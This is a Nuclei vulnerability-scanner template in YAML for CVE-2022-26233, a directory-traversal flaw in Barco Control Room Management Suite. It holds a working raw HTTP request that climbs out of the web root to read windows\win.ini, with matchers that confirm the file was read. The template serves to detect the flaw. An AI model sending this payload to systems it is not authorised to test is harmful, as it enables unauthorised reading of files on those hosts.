nuclei-templates/http/cves/2022/CVE-2022-26233.yaml

41 lines
1.3 KiB
YAML
Raw Normal View History

2022-05-05 01:55:44 +00:00
id: CVE-2022-26233
info:
name: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion
2022-05-05 01:55:44 +00:00
author: 0x_Akoko
severity: high
description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
2022-05-05 01:55:44 +00:00
reference:
- https://0day.today/exploit/37579
- http://seclists.org/fulldisclosure/2022/Apr/0
- http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-26233
2022-05-05 01:55:44 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-05-05 01:55:44 +00:00
cvss-score: 7.5
cve-id: CVE-2022-26233
cwe-id: CWE-22
cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:*
epss-score: 0.00411
tags: cve,cve2022,barco,lfi,seclists,packetstorm
metadata:
max-request: 1
2022-05-05 01:55:44 +00:00
http:
- raw:
- |+
GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
Host: {{Hostname}}
2022-05-05 01:55:44 +00:00
unsafe: true
2022-05-05 01:55:44 +00:00
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
# Enhanced by mp on 2022/07/15